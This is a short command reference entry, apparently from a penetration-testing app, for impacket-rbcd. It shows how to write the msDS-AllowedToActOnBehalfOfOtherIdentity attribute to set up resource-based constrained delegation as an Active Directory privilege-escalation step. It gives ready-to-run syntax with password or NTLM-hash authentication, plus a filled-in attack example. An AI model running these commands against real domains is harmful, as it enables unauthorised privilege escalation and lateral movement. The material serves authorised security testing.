Impacket RBCD Write

Write msDS-AllowedToActOnBehalfOfOtherIdentity to configure RBCD on a target

Tool
impacket-rbcd
Category
Privilege Escalation / Delegation Abuse
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-rbcd -dc-host <ip> -delegate-from '<computer>' -delegate-to '<target>' -action 'write' '<domain>/<user>:<password>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-rbcd -dc-host <ip> -delegate-from '<computer>' -delegate-to '<target>' -action 'write' -hashes ':<hash>' '<domain>/<user>'

Read (verify) requires password

impacket-rbcd -dc-host <ip> -delegate-from '<computer>' -delegate-to '<target>' -action 'read' '<domain>/<user>:<password>'

Examples

impacket-rbcd -dc-host 192.168.1.2 -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'US-HELPDESK$' -action 'write' -hashes ':e53153fc2dc8d4c5a5839e46220717e5' 'corp.local/mgmtadmin'

Tags

impacket rbcd delegation resource-based constrained-delegation msds-allowedtoactonbehalfofotheridentity